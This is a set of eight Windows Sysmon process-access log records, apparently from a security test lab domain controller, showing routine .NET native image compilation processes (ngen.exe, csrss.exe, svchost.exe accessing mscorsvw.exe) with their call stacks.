{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.304\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001064990C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.304","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001064990C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7231,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.304\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001064990C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.304","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001064990C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7232,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001064990C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001064990C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.351\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010EF9C0C00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.351","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010EF9C0C00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.351\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010EF9C0C00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.351","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010EF9C0C00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.351\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010EF9C0C00}\r\nTargetProcessId: 1160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.351","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010EF9C0C00}","TargetProcessId":"1160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010F4A00C00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010F4A00C00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010F4A00C00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010F4A00C00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
